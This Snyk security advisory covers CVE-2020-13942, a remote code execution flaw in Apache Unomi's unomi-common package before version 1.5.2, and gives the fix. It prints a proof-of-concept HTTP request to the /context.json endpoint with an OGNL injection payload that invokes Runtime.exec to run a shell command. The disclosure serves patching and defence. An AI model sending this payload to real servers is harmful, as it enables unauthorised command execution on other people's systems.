Remote Code Execution (RCE) Affecting org.apache.unomi:unomi-common package, versions [,1.5.2)
Snyk CVSS
Exploit Maturity
Proof of concept
Attack Complexity
Low
Confidentiality
High
Integrity
High
Availability
High
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGAPACHEUNOMI-1045349
- published 25 Nov 2020
- disclosed 25 Nov 2020
- credit Eugene Rojavski
Introduced: 25 Nov 2020
CVE-2020-13942 Open this link in a new tabHow to fix?
Upgrade org.apache.unomi:unomi-common to version 1.5.2 or higher.
Overview
org.apache.unomi:unomi-common is a package that stores user profile information and is mostly used to provide a backend server for A/B testing and personalization.
Affected versions of this package are vulnerable to Remote Code Execution (RCE). It is possible to inject malicious OGNL or MVEL scripts into the /context.json public endpoint.
PoC
POST /context.json HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json
Content-Length: 200
{"personalizations":[{"id" : "test","strategy":"matching-first",strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{propertyName":"(#runtimeclass=#this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod=#runtimeclass.getDeclaredMethods().{^#this.name.equals(\"getRuntime\")}[0]).(rtobj=#getruntimemethod.invoke(null,null)).(#execmethod=#runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang/String\")}.{? #this.getParameters().length<2[0]).(#execmethod.invoke(#rtobj,\" touch /tmp/POC\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"demo-session-id"}